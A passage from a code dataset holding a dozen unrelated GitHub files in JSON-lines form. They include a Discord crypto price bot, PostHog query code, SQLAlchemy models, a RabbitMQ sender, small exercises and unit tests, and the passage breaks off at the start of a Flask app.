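# A self-contained version of the commented-out PyVista flat surface described above,
# kept commented out like its surroundings (assumes pyvista and numpy are installed;
# the grid bounds and noise amplitude match the comments):
# import numpy as np
# import pyvista as pv
# x, y = np.meshgrid(np.linspace(0, 20, 200), np.linspace(0, 10, 200))
# z = np.random.normal(scale=0.05, size=x.shape)  # flat plane plus mild noise
# pv.StructuredGrid(x, y, z).plot(cmap="viridis")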
(you can use any function)\n # # For example, a flat surface at z = 0\n # z_grid = np.zeros_like(x_grid)\n\n # # Optionally, add some noise to the surface for realism\n # noise_amplitude = 0.05\n # z_grid += np.random.normal(scale=noise_amplitude, size=z_grid.shape)\n\n # # Create a PyVista structured grid\n # grid = pv.StructuredGrid(x_grid, y_grid, z_grid)\n\n # # Add the grid to the PyVista plotter\n # self.plotter.add_mesh(grid, cmap=\"viridis\")\n # # Create a PyVistaQt interactor and embed it in the Toplevel window\n # interactor = QtInteractor(self.plotter)\n # interactor.interactor.Initialize()\n # interactor.interactor.Start()\n \n # self.plotter.place(x=300,y=50)\n # # plotter_widget.pack(fill=tk.BOTH, expand=True)\n\n # # #Help menu\n # # # self.menubar.add_menu(label=\"Help\")\n\n # # #file panel\n # # self.file_panel=CustomFileFrame(self,width=200,height=self.height-30,bg=self.sidebars_bg)\n # # self.file_panel.place(x=0,y=30)\n \n # # self.file_panel.add_files(self.vault)\n # # self.bind_files()\n\n def move_window(self,x,y):\n self.geometry(\"{}x{}+{}+{}\".format(self.width,self.height,x,y))\n\n def quit(self,*args):\n exit()","repo_name":"jOrtegaFreire/MarlinGCodeSender","sub_path":"windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13744238906","text":"'''На техническом собеседовании претенденты на должность получают оценку за тест. В следующий тур собеседования проходят кандидаты, \nсдавшие тест на 83 балла включительно или выше. Реализуйте оператор контроля выполнения так, чтобы он присвоил логической переменной is_next значение True, \nесли количество набранных баллов будет больше или равно 83. 
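# English translation of the Russian assignment text above, for reference:
# "At a technical interview, candidates receive a score for a test. Candidates who
# score 83 points or higher advance to the next round of interviews. Implement the
# control flow so that the boolean variable is_next is set to True when the number of
# points scored is greater than or equal to 83, and to False otherwise."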
В противном случае значение переменной равно False.'''\n\nis_next = None\nnum = int(input(\"Введите количество баллов: \"))\n\nif num >= 83:\n is_next = True\nelse:\n is_next = False\n","repo_name":"shuaaam/goit-python-hw1-5","sub_path":"module-2/hw2_1.py","file_name":"hw2_1.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39513050859","text":"from typing import Any, Dict, Tuple\n\nfrom posthog.constants import TREND_FILTER_TYPE_ACTIONS, PropertyOperatorType\nfrom posthog.models import Entity\nfrom posthog.models.action.util import format_action_filter\nfrom posthog.models.filters.mixins.utils import cached_property\nfrom posthog.models.filters.stickiness_filter import StickinessFilter\nfrom posthog.queries.event_query import EventQuery\nfrom posthog.queries.person_query import PersonQuery\nfrom posthog.queries.util import get_person_properties_mode, get_start_of_interval_sql\nfrom posthog.utils import PersonOnEventsMode\n\n\nclass StickinessEventsQuery(EventQuery):\n _entity: Entity\n _filter: StickinessFilter\n\n def __init__(self, entity: Entity, *args, **kwargs):\n self._entity = entity\n super().__init__(*args, **kwargs)\n\n def get_query(self) -> Tuple[str, Dict[str, Any]]:\n prop_query, prop_params = self._get_prop_groups(\n self._filter.property_groups.combine_property_group(PropertyOperatorType.AND, self._entity.property_groups),\n person_properties_mode=get_person_properties_mode(self._team),\n person_id_joined_alias=self._person_id_alias,\n )\n\n self.params.update(prop_params)\n\n actions_query, actions_params = self.get_actions_query()\n self.params.update(actions_params)\n\n date_query, date_params = self._get_date_filter()\n self.params.update(date_params)\n\n person_query, person_params = self._get_person_query()\n self.params.update(person_params)\n\n groups_query, groups_params = self._get_groups_query()\n self.params.update(groups_params)\n\n null_person_filter = (\n f\"AND notEmpty({self.EVENT_TABLE_ALIAS}.person_id)\"\n if self._person_on_events_mode != PersonOnEventsMode.DISABLED\n else \"\"\n )\n\n sample_clause = \"SAMPLE %(sampling_factor)s\" if self._filter.sampling_factor else \"\"\n self.params.update({\"sampling_factor\": self._filter.sampling_factor})\n\n query = f\"\"\"\n SELECT\n {self.aggregation_target()} AS aggregation_target,\n countDistinct(\n {get_start_of_interval_sql(self._filter.interval, team=self._team)}\n ) as num_intervals\n FROM events {self.EVENT_TABLE_ALIAS}\n {sample_clause}\n {self._get_person_ids_query()}\n {person_query}\n {groups_query}\n WHERE team_id = %(team_id)s\n {date_query}\n AND {actions_query}\n {prop_query}\n {null_person_filter}\n GROUP BY aggregation_target\n \"\"\"\n\n return query, self.params\n\n @cached_property\n def _person_query(self):\n return PersonQuery(\n self._filter,\n self._team_id,\n self._column_optimizer,\n extra_fields=self._extra_person_fields,\n entity=self._entity,\n )\n\n def _determine_should_join_distinct_ids(self) -> None:\n if self._person_on_events_mode == PersonOnEventsMode.V1_ENABLED:\n self._should_join_distinct_ids = False\n else:\n self._should_join_distinct_ids = True\n\n def _determine_should_join_persons(self) -> None:\n EventQuery._determine_should_join_persons(self)\n if self._person_on_events_mode != PersonOnEventsMode.DISABLED:\n self._should_join_persons = False\n\n def aggregation_target(self):\n return self._person_id_alias\n\n def get_actions_query(self) -> Tuple[str, Dict[str, 
Any]]:\n if self._entity.type == TREND_FILTER_TYPE_ACTIONS:\n return format_action_filter(\n team_id=self._team_id,\n action=self._entity.get_action(),\n person_properties_mode=get_person_properties_mode(self._team),\n person_id_joined_alias=f\"{self.aggregation_target()}\",\n hogql_context=self._filter.hogql_context,\n )\n elif self._entity.id is None:\n return \"1 = 1\", {}\n else:\n return \"event = %(event)s\", {\"event\": self._entity.id}\n","repo_name":"PostHog/posthog","sub_path":"posthog/queries/stickiness/stickiness_event_query.py","file_name":"stickiness_event_query.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"73859784488","text":"#!/usr/bin/env python\r\n\r\n#Importing the Python Library for RabbitMQ\r\nimport pika\r\nimport json\r\nimport requests\r\n\r\n#Creating a connection to RabbitMQ\r\n#Assuming RabbitMQ is running on localhost\r\n#If not, change the host to the IP address of the machine where RabbitMQ is running\r\n\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\r\nchannel = connection.channel()\r\n\r\n#Creating a queue named hello\r\n#If the queue already exists, this method does nothing\r\n\r\nchannel.queue_declare(queue = 'task_queue')\r\nmessage = {'id': 1, 'name': 'name1'}\r\n\r\n#Publishing a message to the queue\r\n#Json dumps is used to convert the message to a string\r\nchannel.basic_publish(exchange='',\r\n routing_key='task_queue',\r\n body=json.dumps(message),\r\n properties=pika.BasicProperties(\r\n delivery_mode = 2, # make message persistent\r\n ))\r\nprint(\" [x] Sent %r\" % message)\r\n\r\n#connection.close()\r\nconnection.close()\r\n","repo_name":"harindergarcha/CS361-Assignment-8","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29313584993","text":"\nimport os\nimport json\nimport logging\nimport aiohttp\nimport asyncio\nimport sys\nfrom collections import namedtuple\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s,%(msecs)d %(levelname)s: %(message)s\",\n datefmt=\"%H:%M:%S\",\n)\nlog = logging\n\n\nclass FetchAlphaVantage(object):\n _BASE_API_URL = \"https://www.alphavantage.co/query?function=\"\n _API_URL_TIME_SERIES_ADJ = _BASE_API_URL + \\\n \"TIME_SERIES_DAILY_ADJUSTED&symbol=\"\n _API_URL_FOREX_WEEKLY = _BASE_API_URL + \"FX_WEEKLY\"\n\n _RATE_LIMIT = 5\n\n def __init__(self, api_key=None,\n symbols: list = [],\n out_path='../data/data_raw/'):\n\n if api_key is None:\n api_key = os.environ.get('ALPHA_VANTAGE_API_KEY')\n if not api_key or not isinstance(api_key, str):\n raise ValueError(\n 'you need to provide a valid Alpha Vantage API key')\n if not isinstance(symbols, list):\n raise ValueError('symbols parameter needs to be a list type')\n self._out_path = out_path\n StockInfo: tuple = namedtuple('Stock', ['symbol', 'url'])\n self._stocks_meta: list = [\n StockInfo(symbol,\n FetchAlphaVantage._API_URL_TIME_SERIES_ADJ + symbol +\n \"&outputsize=full\" + f\"&apikey={api_key}\")\n for symbol in symbols\n ]\n\n self._loop = asyncio.get_event_loop()\n self._loop.set_debug(True)\n self._sema = asyncio.Semaphore(FetchAlphaVantage._RATE_LIMIT)\n self._loop.run_until_complete(self._fetch_all())\n\n async def _fetch_all(self):\n # API call frequency is 5 calls per minute and\n # 500 calls per day, so we need to rate limit our requests :/\n 
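# At this step the class above combines asyncio.Semaphore(5) with a 60 s sleep per
# request, so at most 5 downloads run per minute. The bare rate-limiting pattern, as a
# sketch:
import asyncio
async def rate_limited(sema, fetch, *args):
    async with sema:                 # at most N slots in flight...
        result = await fetch(*args)
        await asyncio.sleep(60)      # ...each held for a minute => <= N calls/min
        return result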
async with aiohttp.ClientSession(loop=self._loop) as session:\n await asyncio.gather(*[self._fetch(session, stock_meta.symbol, stock_meta.url) for stock_meta in self._stocks_meta],\n return_exceptions=True)\n\n async def _fetch(self, session, symbol, url):\n async with self._sema, session.get(url) as response:\n response.raise_for_status()\n log.info(\n \"Got response [%s] for URL: %s with symbol: %s\", response.status, url, symbol)\n data = await response.json()\n # print(data)\n FetchAlphaVantage._write_json_file(self._out_path, symbol, data)\n await asyncio.sleep(60)\n # 5 calls per minute are permitted by this API\n\n @staticmethod\n def _write_json_file(out_path, symbol, data):\n with open(f'../data/data_raw/data_{symbol}.json', \"w\") as write_json:\n json.dump(data, write_json, indent=2, sort_keys=False)\n\n log.info(\"Wrote results for symbol: %s\", symbol)\n\n\nif __name__ == \"__main__\":\n symbols: list = ['aapl', 'abt', 'adbe', 'amd', 'amzn', 'baba',\n 'brkb', 'c', 'cmcsa', 'cost', 'crm', 'dell', 'f', 'fb', 'googl', 'ibm', 'intc',\n 'intu', 'jnj', 'jpm', 'msft', 'mu', 'nflx', 'nke', 'nvda', 'orcl', 'pfe', 'pg',\n 'pypl', 'sbux', 't', 'tsla', 'twtr', 'unh', 'v', 'vz', 'wfc', 'wmt']\n\n FetchAlphaVantage(symbols=symbols)\n","repo_name":"schairez/stock-analysis-py","sub_path":"stocktools/alpha_vantage.py","file_name":"alpha_vantage.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38282421545","text":"def duplicates(arr, n):\n dic={}\n l=[]\n for x in arr:\n if x in dic:\n dic[x]=dic[x]+1\n else:\n dic[x]=1\n for i in dic:\n if dic[i]>1:\n l.append(i)\n if(len(l)==0):\n return [-1]\n else:\n l.sort()\n return l\n \n \n\t# code here\n\t \n\n\n\n#{ \n# Driver Code Starts\nif(__name__=='__main__'):\n t = int(input())\n for i in range(t):\n n = int(input())\n arr = list(map(int, input().strip().split()))\n res = duplicates(arr, n)\n for i in res:\n print(i,end=\" \")\n print()\n\n\n\n# } Driver Code Ends\n","repo_name":"AprajitaChhawi/365DaysOfCode.JANUARY","sub_path":"Day 11 find duplicate elements.py","file_name":"Day 11 find duplicate elements.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15457080265","text":"import pandas as pd \nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\ncsv_path = '/home/member/Workspace/haimd/classfication_pytorch/train.csv'\n\ndata = pd.read_csv(csv_path)\nx, y = data.iloc[:, 0], data.iloc[:, 1]\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2)\n\ndf_train = pd.DataFrame.from_dict({'image_id': x_train, 'label':y_train})\ndf_test = pd.DataFrame.from_dict({'image_id': x_test, 'label':y_test})\ndf_train.to_csv('tn.csv', index=False)\ndf_test.to_csv('tt.csv', index=False)\n# import ipdb; ipdb.set_trace()","repo_name":"vodanhbk95/classification_pytorch","sub_path":"src/split_dataset.py","file_name":"split_dataset.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74817238886","text":"import requests\nimport discord\nimport json\nfrom discord.ext.tasks import loop\n\n\ndef get_price():\n a = requests.get('https://api.binance.com/api/v3/ticker/price?symbol=ETHUSDT')\n json_data = json.loads(a.text)\n price = round(float(json_data['price']), 3)\n return price\n\n\ndef get_change():\n a = 
requests.get('https://api.binance.com/api/v3/ticker/24hr?symbol=ETHUSDT')\n json_data = json.loads(a.text)\n t = \"\"\n if float(json_data['priceChangePercent']) >= 0:\n t = \"+\"\n else:\n t = \"\"\n per = str(\n \"{2}{0} ({2}{1}%)\".format(round(float(json_data['priceChange']), 3),\n round(float(json_data['priceChangePercent']), 2), t))\n\n return per, t\n\n\nclient = discord.Client()\nprint(get_price())\ntk = ''\ncolor = \"-\"\n\n\n@client.event\nasync def on_ready():\n print(\"We have logged in as {0.user}\".format(client))\n set_name.start()\n\n\n@loop(count=None, seconds=1)\nasync def set_name():\n name = \"ETH $\" + str(get_price())\n global color\n change = get_change()\n st = change[0]\n if color != change[1]:\n color = change[1]\n if color == \"+\":\n for x in client.guilds:\n rrole = x.get_role(846495911135936542)\n grole = x.get_role(846495878130958406)\n try:\n await x.me.add_roles(grole)\n await x.me.remove_roles(rrole)\n except:\n pass\n else:\n for x in client.guilds:\n rrole = x.get_role(846495911135936542)\n grole = x.get_role(846495878130958406)\n\n try:\n await x.me.add_roles(rrole)\n await x.me.remove_roles(grole)\n\n except:\n pass\n\n await client.change_presence(activity=discord.Game(st))\n for i in client.guilds:\n await i.me.edit(nick=name)\n\n\nclient.run(tk)\n","repo_name":"AdityaPunetha/Binance-Ticker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21647076881","text":"from opengpt.models.completion.evagpt4.model import Model as EvaGPT4_Model\nfrom opengpt.models.image.hotpot.model import Model as Hotpot_Model\nfrom opengpt.models.completion.chatbase.model import Model as ChatBase_Model\nfrom opengpt.models.completion.chatllama.model import Model as ChatLlama_Model\n\nfrom flask import Flask,request\nimport pandas as pd\napp = Flask(__name__)\n\n@app.route('/EvaGPT4',methods=['POST'])\ndef EvaGPT4():\n evagpt4 = EvaGPT4_Model()\n messages = request.json[\"messages\"]\n df=pd.DataFrame(messages)\n df=df[[\"role\",\"content\"]]\n df=df.to_dict(orient=\"records\")\n # messages = [\n # {\"role\": \"system\", \"content\": \"You are Ava, an AI Agent.\"},\n # {\"role\": \"assistant\", \"content\": \"Hello! 
How can I help you today?\"},\n # {\"role\": \"user\", \"content\": \"\"\"GPT4\"\"\"}\n # ] # List of messages in the chat history\n\n result = evagpt4.ChatCompletion(df)\n return result\n\n@app.route('/Hotpot',methods=['POST'])\ndef Hotpot():\n request_data = request.get_json()\n style=\"Hotpot Art 9\"\n width=1250\n height=1000\n prompt=None\n\n if request_data:\n if \"style\" in request_data:\n style = request_data[\"style\"]\n\n if \"width\" in request_data:\n width = request_data[\"width\"]\n\n if \"height\" in request_data:\n height = request_data[\"height\"]\n\n if \"prompt\" in request_data:\n prompt = request_data[\"prompt\"]\n\n Hotpot = Hotpot_Model(style=style)\n\n result = Hotpot.Generate(prompt=prompt,width=width,height=height)\n\n return {\"url\":result.url}\n\n@app.route('/ChatBase',methods=['POST'])\ndef ChatBase():\n messages = request.json[\"messages\"]\n df=pd.DataFrame(messages)\n df=df.loc[len(df)-1,\"content\"]\n chatbase = ChatBase_Model()\n result =chatbase.GetAnswer(prompt=df, model=\"gpt-4\")\n\n return result\n\n\n@app.route('/ChatLlama',methods=['POST'])\ndef ChatLlama():\n messages = request.json[\"messages\"]\n df=pd.DataFrame(messages)\n df=df.loc[len(df)-1,\"content\"]\n ChatLlama = ChatLlama_Model()\n result =ChatLlama.GetAnswer(prompt=df)\n return result\n\n\n# app.run(debug=True)","repo_name":"Avirupsett/OpenGPT","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15868209163","text":"import sys\nimport torch\nimport torchvision\nimport numpy as np\nfrom PIL import Image\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\ncuda = 1\ngpu_id = 0\ndevice = torch.device(\"cuda:\"+str(gpu_id) if torch.cuda.is_available() and cuda == 1 else \"cpu\")\nprint(\"Device:\", device)\n\n\nfolder = sys.argv[1]\ntask = sys.argv[2]\n\ngenerator = torch.load(\"saved_models/generator_model_\"+task+\"_3.pt\", map_location='cpu').to(device)\ngenerator.eval()\nroot_dir_input = \"datasets/\"+folder+\"/test_\"+task+\"/input/\"\nroot_dir_output = \"datasets/\"+folder+\"/test_\"+task+\"/output/\"\nfiles = os.listdir(root_dir_input)\n\nwith torch.no_grad():\n\tfor file in files:\n\t\tinp = Image.open(root_dir_input + file)\n\t\ttrans = torchvision.transforms.ToTensor()\n\t\ttrans1 = torchvision.transforms.ToPILImage()\n\t\ttensor = 2.0*(trans(inp)-0.5).to(device)\n\t\ttensor = tensor.view(1,tensor.shape[0],tensor.shape[1],tensor.shape[2])\n\t\toutput = ((generator(tensor)/2.0)+0.5)\n\t\t# tensor = ((tensor/2.0)+0.5)\n\t\toutput = output.view(output.shape[1],output.shape[2],output.shape[3])\n\t\t\n\t\toutput_image = trans1(output)\n\n\t\t# output_image.show()\n\t\toutput_image.save(root_dir_output+file)\n\t\tprint(\"Image %s done\" % (file))","repo_name":"darth-c0d3r/pix2pix","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9714745334","text":"from sqlalchemy import Column, ForeignKey\nfrom sqlalchemy import String, Integer, Date\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\n\nfrom pyramid_oereb.contrib.data_sources.standard.models import (\n get_office,\n get_view_service,\n get_legend_entry,\n get_geometry\n)\n\n\nclass Models(object):\n\n def __init__(self, office, view_service,\n legend_entry, public_law_restriction, geometry, 
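# The predict.py record above maps images to [-1, 1] before the generator and
# back to [0, 1] afterwards. A self-contained sketch of that round trip under
# torch.no_grad(); nn.Identity() stands in for the trained generator.
import torch

def to_model_range(x):    # [0, 1] -> [-1, 1]
    return 2.0 * (x - 0.5)

def from_model_range(y):  # [-1, 1] -> [0, 1]
    return y / 2.0 + 0.5

model = torch.nn.Identity()
with torch.no_grad():            # no autograd bookkeeping during inference
    x = torch.rand(1, 3, 8, 8)   # stand-in image batch in [0, 1)
    y = from_model_range(model(to_model_range(x)))
assert torch.allclose(x, y)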
base,\n db_connection, schema_name):\n\n self.Office = office\n self.ViewService = view_service\n self.LegendEntry = legend_entry\n self.PublicLawRestriction = public_law_restriction\n self.Geometry = geometry\n self.Base = base\n self.db_connection = db_connection\n self.schema_name = schema_name\n\n\ndef model_factory(schema_name, pk_type, geometry_type, srid, db_connection):\n \"\"\"\n Factory to produce a set of standard models.\n\n Args:\n schema_name (str): The name of the database schema where this models belong to.\n pk_type (sqlalchemy.sql.type_api.TypeEngine): The type of the primary column. E.g.\n sqlalchemy.String or sqlalchemy.Integer or another one fitting the underlying DB\n needs\n geometry_type (str): The geoalchemy geometry type defined as well known string.\n srid (int): The SRID defining the projection of the geometries stored in standard db schema.\n \"\"\"\n Base = declarative_base()\n\n Office = get_office(Base, schema_name, pk_type)\n ViewService = get_view_service(Base, schema_name, pk_type)\n LegendEntry = get_legend_entry(Base, schema_name, pk_type, ViewService)\n\n class PublicLawRestriction(Base):\n \"\"\"\n The container where you can fill in all your public law restrictions to the topic.\n\n Attributes:\n id (str): The identifier. This is used in the database only and must not be set manually. If\n you don't like it - don't care about.\n law_status (str): The status switch if the document is legally approved or not.\n published_from (datetime.date): The date when the document should be available for\n publishing on extracts. This directly affects the behaviour of extract\n generation.\n published_until (datetime.date): The date starting from which the document should not be\n published anymore on extracts. This directly affects the behaviour of extract generation.\n geolink (int): The OEREBlex GEO-Link ID to query the documents.\n view_service_id (str): The foreign key to the view service this public law restriction is\n related to.\n view_service (ViewService):\n The dedicated relation to the view service instance from database.\n office_id (str): The foreign key to the office which is responsible to this public law\n restriction.\n responsible_office (Office):\n The dedicated relation to the office instance from database.\n legend_entry_id (str): The foreign key to the legend entry this public law restriction is\n related to.\n legend_entry (pyramid_oereb.standard.models.airports_building_lines.LegendEntry):\n The dedicated relation to the legend entry instance from database.\n \"\"\"\n __table_args__ = {'schema': schema_name}\n __tablename__ = 'public_law_restriction'\n id = Column(pk_type, primary_key=True, autoincrement=False)\n law_status = Column(String, nullable=False)\n published_from = Column(Date, nullable=False)\n published_until = Column(Date, nullable=True)\n geolink = Column(Integer, nullable=False)\n view_service_id = Column(\n ForeignKey(ViewService.id),\n nullable=False\n )\n view_service = relationship(\n ViewService,\n backref='public_law_restrictions'\n )\n office_id = Column(\n ForeignKey(Office.id),\n nullable=False\n )\n responsible_office = relationship(Office)\n legend_entry_id = Column(\n ForeignKey(LegendEntry.id),\n nullable=False\n )\n legend_entry = relationship('LegendEntry', backref='public_law_restrictions')\n\n Geometry = get_geometry(Base, schema_name, pk_type, geometry_type, srid, PublicLawRestriction)\n\n return Models(\n Office, ViewService,\n LegendEntry, PublicLawRestriction, Geometry, Base,\n db_connection, 
schema_name\n )\n\n\ndef model_factory_string_pk(schema_name, geometry_type, srid, db_connection):\n \"\"\"\n Args:\n schema_name (str): The name of the database schema where this models belong to.\n geometry_type (str): The geoalchemy geometry type defined as well known string.\n srid (int): The SRID defining the projection of the geometries stored in standard db schema.\n db_connection (str): the db connection string\n\n Returns:\n Models: the produced set of standard models\n \"\"\"\n return model_factory(schema_name, String, geometry_type, srid, db_connection)\n\n\ndef model_factory_integer_pk(schema_name, geometry_type, srid, db_connection):\n \"\"\"\n Args:\n schema_name (str): The name of the database schema where this models belong to.\n geometry_type (str): The geoalchemy geometry type defined as well known string.\n srid (int): The SRID defining the projection of the geometries stored in standard db schema.\n db_connection (str): the db connection string\n\n Returns:\n Models: the produced set of standard models\n \"\"\"\n return model_factory(schema_name, Integer, geometry_type, srid, db_connection)\n","repo_name":"openoereb/pyramid_oereb","sub_path":"pyramid_oereb/contrib/data_sources/oereblex/models/theme.py","file_name":"theme.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"37832107476","text":"import graphene\n\nfrom ideahunt.graphql.objects import CommentModel\nfrom ideahunt.helpers import assert_authenticated_user\nfrom ideahunt.models import Comment, db\n\n\nclass CreateComment(graphene.Mutation):\n \"\"\"\n Create Comment mutation\n \"\"\"\n\n comment = graphene.Field(lambda: CommentModel)\n\n class Arguments:\n description = graphene.String(required=True)\n idea_id = graphene.ID(required=True)\n\n def mutate(root, info, **kwargs):\n assert_authenticated_user(info.context)\n viewer = info.context.viewer\n comment = Comment(\n description=kwargs.get(\"description\"),\n idea_id=kwargs.get(\"idea_id\"),\n author_id=viewer.id,\n )\n db.session.add(comment)\n db.session.commit()\n return CreateComment(comment=comment)\n","repo_name":"drizzleco/ideahunt","sub_path":"ideahunt/ideahunt/graphql/mutations/create_comment.py","file_name":"create_comment.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35153771357","text":"from ast import literal_eval\n\n\nclass RadixNode:\n def __init__(self, children=None, readers=None, writer=None):\n self.children = children if children is not None else {}\n self.readers = readers if readers is not None else []\n self.writer = writer\n\n def __repr__(self):\n retval = {}\n\n if len(self.readers) > 0:\n retval['readers'] = self.readers\n if self.writer is not None:\n retval['writer'] = self.writer\n if len(self.children) > 0:\n retval['children'] = \\\n {k: literal_eval(repr(v)) for k, v in self.children.items()}\n\n return repr(retval)\n\n\nclass RadixTree:\n def __init__(self, token_size=2):\n self._token_size = token_size\n self._root = RadixNode()\n\n def __repr__(self):\n return repr(self._root)\n\n def _tokenize_address(self, address):\n return [address[i:i + self._token_size]\n for i in range(0, len(address), self._token_size)]\n\n def _get(self, address, create=False):\n tokens = self._tokenize_address(address)\n\n node = self._root\n for token in tokens:\n if token in node.children:\n node = node.children[token]\n else:\n if not 
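# model_factory() above builds one set of ORM classes per database schema by
# closing over schema_name. A stripped-down sketch of that pattern with
# hypothetical table/column names (declarative_base imported here from
# sqlalchemy.orm, its current location; the record uses the older
# sqlalchemy.ext.declarative path):
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import declarative_base

def make_models(schema_name):
    Base = declarative_base()   # fresh registry per schema

    class Thing(Base):
        __tablename__ = 'thing'
        __table_args__ = {'schema': schema_name}  # schema injected per call
        id = Column(Integer, primary_key=True)
        name = Column(String)

    return Base, Thing

_, ThingA = make_models('schema_a')
_, ThingB = make_models('schema_b')
assert ThingA.__table__.schema != ThingB.__table__.schema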
create:\n return None\n child = RadixNode()\n node.children[token] = child\n node = child\n\n return node\n\n def get(self, address):\n return self._get(address)\n\n def add_reader(self, address, reader):\n node = self._get(address, create=True)\n node.readers.append(reader)\n\n def set_writer(self, address, writer):\n node = self._get(address, create=True)\n node.readers = []\n node.writer = writer\n node.children = {}\n\n def find_readers_and_writers(self, address):\n readers_and_writers = []\n\n tokens = self._tokenize_address(address)\n\n node = self._root\n for token in tokens:\n if token in node.children:\n node = node.children[token]\n else:\n break\n\n readers_and_writers.extend(node.readers)\n if node.writer is not None and \\\n node.writer not in readers_and_writers:\n readers_and_writers.append(node.writer)\n\n return readers_and_writers\n\n\nclass TopologicalSorter:\n def __init__(self):\n self._count = {}\n self._successors = {}\n self._identifiers = []\n\n def _init(self, identifier):\n if identifier not in self._count:\n self._count[identifier] = 0\n if identifier not in self._successors:\n self._successors[identifier] = []\n if identifier not in self._identifiers:\n self._identifiers.append(identifier)\n\n def add_relation(self, predecessor, successor):\n self._init(predecessor)\n self._init(successor)\n self._count[successor] += 1\n self._successors[predecessor].append(successor)\n\n def order(self):\n retval = []\n\n while len(self._identifiers) > 0:\n found = None\n for identifier in self._identifiers:\n if self._count[identifier] == 0:\n found = identifier\n break\n if found is not None:\n retval.append(found)\n for successor in self._successors[found]:\n self._count[successor] -= 1\n\n self._identifiers.remove(found)\n del self._count[found]\n del self._successors[found]\n else:\n raise Exception(\"non-acyclic graph detected, aborting\")\n\n return retval\n","repo_name":"vdt/sawtooth-core","sub_path":"validator/sawtooth_validator/scheduler/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74466493928","text":"import unittest\nfrom src import db\n\nfrom src.database.models import Alerts, AnomalyEquations, EmailInformation, DeviceInformation\n\n\nclass TestInsert(unittest.TestCase):\n \"\"\"Tests insertion of objects into database tables using sqlalchemy\"\"\"\n\n def setUp(self) -> None:\n self.db = db\n self.db.create_session()\n self.alert = Alerts(alert_type='IDS', description='test', severity=1, mac_address='00:00:00:00:00',\n payload='foobar')\n self.anamoly_eq = AnomalyEquations(average_equation=\"test\", adjustment_equation=\"test\")\n self.email_info = EmailInformation(recipient_addresses='test@email.com, foo@bar.com',\n sender_address='openwrt@alert.com',\n sender_email_password='super_secure_password',\n smtp_server='smtp.test.com')\n self.device_info = DeviceInformation(mac_address='00:00:00:00:00:00',\n name='test',\n ip_address='192.168.0.1')\n\n def test_insert_alert(self):\n Alerts.insert_new_object(self.alert)\n result = self.db.session.query(Alerts).filter(Alerts.description == 'test').first()\n self.assertEqual(self.alert, result)\n self.db.session.delete(result)\n\n def test_insert_anomaly_equation(self):\n AnomalyEquations.insert_new_object(self.anamoly_eq)\n result = self.db.session.query(AnomalyEquations).filter(AnomalyEquations.average_equation == \"test\").first()\n self.assertEqual(self.anamoly_eq, result)\n 
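# The TopologicalSorter record above is Kahn's algorithm: track in-degree
# counts and emit nodes whose count drops to zero. A quick usage sketch
# against the class as defined in that record:
ts = TopologicalSorter()
ts.add_relation('a', 'b')   # 'a' must come before 'b'
ts.add_relation('b', 'c')
ts.add_relation('a', 'c')
order = ts.order()
assert order.index('a') < order.index('b') < order.index('c')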
self.db.session.delete(result)\n\n def test_insert_email_information(self):\n EmailInformation.insert_new_object(self.email_info)\n result = self.db.session.query(EmailInformation).filter(\n EmailInformation.recipient_addresses == \"test@email.com, foo@bar.com\") \\\n .first()\n self.assertEqual(self.email_info, result)\n self.db.session.delete(result)\n\n def test_insert_device_information(self):\n DeviceInformation.insert_new_object(self.device_info)\n result = self.db.session.query(DeviceInformation).filter(\n DeviceInformation.mac_address == \"00:00:00:00:00:00\") \\\n .first()\n self.assertEqual(self.device_info, result)\n self.db.session.delete(result)\n\n def tearDown(self) -> None:\n self.db.session.commit()\n\n if __name__ == '__main__':\n unittest.main()\n","repo_name":"briweinstein/tinyHIPPO","sub_path":"tests/database_tests/test_insert.py","file_name":"test_insert.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"73208324647","text":"from flask import Flask, request, render_template\r\nfrom flask_cors import cross_origin\r\nfrom flask import Response\r\nfrom functions import count_n_grams, load_data\r\nfrom preprocessing import Preprocessor\r\nfrom model_building import ModelBuilding\r\nimport json\r\nimport 